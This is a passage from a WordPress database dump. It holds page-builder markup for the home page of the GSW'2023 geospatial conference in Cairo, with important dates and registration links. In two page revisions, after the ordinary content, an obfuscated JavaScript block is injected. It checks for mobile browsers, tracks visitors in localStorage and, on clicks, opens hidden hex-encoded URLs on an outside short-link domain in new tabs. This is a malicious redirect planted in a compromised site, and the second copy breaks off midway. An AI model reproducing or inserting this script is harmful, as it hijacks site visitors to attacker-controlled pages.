offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:10:50','2022-11-09 19:10:50','',3066,'https://gsw2023.com/?p=3204',0,'revision','',0),
(3205,1,'2022-11-09 19:11:49','2022-11-09 19:11:49','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 